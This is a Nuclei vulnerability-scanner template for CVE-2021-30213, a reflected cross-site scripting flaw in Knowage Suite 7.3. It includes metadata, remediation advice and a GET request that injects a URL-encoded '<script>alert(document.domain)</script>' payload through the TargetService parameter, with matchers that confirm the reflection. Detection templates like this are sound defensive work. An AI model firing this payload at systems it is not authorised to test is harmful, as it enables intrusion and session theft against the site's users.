nuclei-templates/http/cves/2021/CVE-2021-30213.yaml

49 lines
1.9 KiB
YAML

id: CVE-2021-30213
info:
name: Knowage Suite 7.3 - Cross-Site Scripting
author: alph4byt3
severity: medium
description: Knowage Suite 7.3 contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can inject arbitrary web script in '/servlet/AdapterHTTP' via the 'targetService' parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in Knowage Suite 7.3.
reference:
- https://github.com/piuppi/Proof-of-Concepts/blob/main/Engineering/XSS-KnowageSuite7-3_unauth.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-30213
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-30213
cwe-id: CWE-79
epss-score: 0.001
epss-percentile: 0.40711
cpe: cpe:2.3:a:eng:knowage:7.3.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: eng
product: knowage
tags: cve,cve2021,xss,knowage,eng
http:
- method: GET
path:
- "{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</script><script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a0046304402207d89f92875e4ae93804a8ae05d6b9c6360450827e26abadbb0c9c874eca6148702201131bfce92c3fd0222622d058f736ebd90901525cf676ccce2c680526b02ee5d:922c64590222798bb761d5b6d8e72950